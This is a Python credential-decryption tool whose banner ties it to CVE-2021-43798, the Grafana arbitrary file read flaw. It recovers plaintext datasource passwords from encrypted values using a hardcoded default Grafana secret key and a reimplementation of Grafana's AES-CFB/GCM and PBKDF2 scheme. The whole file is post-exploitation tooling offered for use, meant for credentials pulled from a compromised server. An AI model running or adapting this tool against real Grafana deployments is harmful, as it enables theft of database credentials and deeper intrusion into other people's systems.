decrypt.py

import base64
import os
import warnings
import requests
import urllib3
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.backends import default_backend
from termcolor import colored
import questionary

# Suppress RequestsDependencyWarning and InsecureRequestWarning
from requests.exceptions import RequestsDependencyWarning
warnings.filterwarnings("ignore", category=RequestsDependencyWarning)
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)

# Constants
SALT_LENGTH = 8
AES_CFB = "aes-cfb"
AES_GCM = "aes-gcm"
ENCRYPTION_ALGORITHM_DELIMITER = b'*'

# Derive the encryption algorithm from the payload
def derive_encryption_algorithm(payload):
    if len(payload) == 0:
        raise ValueError("Unable to derive encryption algorithm")
    
    if payload[0] != ENCRYPTION_ALGORITHM_DELIMITER:
        return AES_CFB, payload  # backwards compatibility
    
    payload = payload[1:]
    alg_delim = payload.find(ENCRYPTION_ALGORITHM_DELIMITER)
    if alg_delim == -1:
        return AES_CFB, payload  # backwards compatibility
    
    alg_b64 = payload[:alg_delim]
    payload = payload[alg_delim+1:]
    
    alg = base64.urlsafe_b64decode(alg_b64)
    return alg.decode(), payload

# Decrypt using GCM mode
def decrypt_gcm(block, payload):
    gcm = Cipher(algorithms.AES(block), modes.GCM(payload[SALT_LENGTH:SALT_LENGTH+12]), backend=default_backend()).decryptor()
    return gcm.update(payload[SALT_LENGTH+12:]) + gcm.finalize()

# Decrypt using CFB mode
def decrypt_cfb(block, payload):
    if len(payload) < 16:
        raise ValueError("Payload too short")
    
    iv = payload[SALT_LENGTH:SALT_LENGTH+16]
    payload = payload[SALT_LENGTH+16:]
    decryptor = Cipher(algorithms.AES(block), modes.CFB(iv), backend=default_backend()).decryptor()
    return decryptor.update(payload) + decryptor.finalize()

# Derive encryption key
def encryption_key_to_bytes(secret, salt):
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=32,
        salt=salt,
        iterations=10000,
        backend=default_backend()
    )
    return kdf.derive(secret.encode())

# Decrypt the payload with the given secret
def decrypt(payload, secret):
    alg, payload = derive_encryption_algorithm(payload)
    
    if len(payload) < SALT_LENGTH:
        raise ValueError("Unable to compute salt")
    
    salt = payload[:SALT_LENGTH]
    key = encryption_key_to_bytes(secret, salt)
    
    block = algorithms.AES(key)
    
    if alg == AES_GCM:
        return decrypt_gcm(key, payload)
    else:
        return decrypt_cfb(key, payload)

# Encrypt the payload with the given secret
def encrypt(payload, secret):
    salt = os.urandom(SALT_LENGTH)
    key = encryption_key_to_bytes(secret, salt)
    block = algorithms.AES(key)
    
    iv = os.urandom(16)
    encryptor = Cipher(algorithms.AES(key), modes.CFB(iv), backend=default_backend()).encryptor()
    encrypted = encryptor.update(payload) + encryptor.finalize()
    
    return salt + iv + encrypted

# Display banner
def display_banner():
    banner = """
    ######################################
             GRAFANA DECRYPTOR
 CVE-2021-43798 Grafana Unauthorized
  arbitrary file reading vulnerability
                SICARI0
    ######################################
    """
    print(colored(banner, 'cyan'))

# Main function
if __name__ == "__main__":
    # Display banner
    display_banner()

    # Prompt for datasource password
    dataSourcePassword = questionary.text("Enter the datasource password:").ask()
    grafanaIni_secretKey = "SW2YcwTIb9zpOOhoPsMm"
    
    encrypted = base64.b64decode(dataSourcePassword)
    PwdBytes = decrypt(encrypted, grafanaIni_secretKey)
    
    print(colored("[*] grafanaIni_secretKey= ", 'white') + colored(f"{grafanaIni_secretKey}", 'green'))
    print(colored("[*] DataSourcePassword= ", 'white') + colored(f"{dataSourcePassword}", 'magenta'))
    print(colored("[*] plainText= ", 'white') + colored(f"{PwdBytes.decode()}", 'red'))

    # Example: Encrypt a plaintext
#    PlainText = "jas502n"
 #   encryptedByte = encrypt(PlainText.encode(), grafanaIni_secretKey)
 #   encryptedStr = base64.b64encode(encryptedByte).decode()
    
 #   print(colored("[*] grafanaIni_secretKey= ", 'white') + colored(f"{grafanaIni_secretKey}", 'green'))
#    print(colored("[*] PlainText= ", 'white') + colored(f"{PlainText}", 'green'))
 #   print(colored("[*] EncodePassword= ", 'white') + colored(f"{encryptedStr}", 'green'))